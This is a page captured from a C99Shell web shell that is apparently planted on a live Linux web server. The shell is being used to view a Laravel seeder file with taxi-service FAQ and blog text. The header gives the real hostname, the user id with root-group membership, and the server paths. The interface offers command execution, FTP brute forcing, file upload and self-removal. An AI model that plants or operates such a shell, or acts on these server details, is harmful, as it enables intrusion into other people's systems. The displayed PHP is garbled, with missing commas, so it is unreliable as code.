!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/database/seeders/   drwxr-xr-x
Free 28.87 GB of 117.98 GB (24.47%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SocialDriverLandingSeeder.php (2.14 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Database\Seeders;
use 
Illuminate\Database\Seeder;
use 
Illuminate\Support\Facades\DB;

class 
SocialDriverLandingSeeder extends Seeder
{
    
/**
     * Run the database seeds.
     *
     * @return void
     */
    
public function run()
    {
        
$posts = [
            [
'post_type'=>'blog','link'=>'#','link_name'=>'{"en":"Learn more"}','title'=>'{"en":"The best drivers and taxi companies"}''description'=>'{"en":"We have partnered with more than 560 leading taxi companies and individual drivers to offer you the best possible experience. Finding your taxi now is lot easier."}''image'=>'https://i.imgur.com/JrkHJ9x.jpg'],
            [
'post_type'=>'blog','link'=>'#','link_name'=>'{"en":"Request taxi now"}','title'=>'{"en":"Making taxi more social"}''description'=>'{"en":"We are changing how taxi work. By bringing it closer to theirs customers. Requesting a taxi via whatsapp, simple for both sides."}''image'=>'https://i.imgur.com/R7Oe2AB.jpg'], 
            [
'post_type'=>'faq','title'=>'{"en":"How i get paid?"}''description'=>'{"en":"Client can pay you at the end of the ride with cash or with cart, PayPal or MercadoPago"}'], 
            [
'post_type'=>'faq','title'=>'{"en":"Can I reject requested ride?"}''description'=>'{"en":"Yes, you can reject the ride based on your preferences. Client will be informed"}'], 
            [
'post_type'=>'faq','title'=>'{"en":"I am individual driver. Can I use the Company plan?"}''description'=>'{"en":"Yes, you can subscribe to any plan offered."}'], 
        ];

        foreach (
$posts as $key => $post) {
            
DB::table('posts')->insert([
                
'post_type' => $post['post_type'],
                
'subtitle' => isset($post['subtitle'])?$post['subtitle']:"",
                
'title' => $post['title'],
                
'description' => $post['description'],
                
'link' => isset($post['link'])?$post['link']:"",
                
'link_name' => isset($post['link_name'])?$post['link_name']:"",
                
'image' =>  isset($post['image'])?$post['image']:"",
                
'created_at' => now(),
                
'updated_at' => now(),
            ]);
        }


    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0086 ]--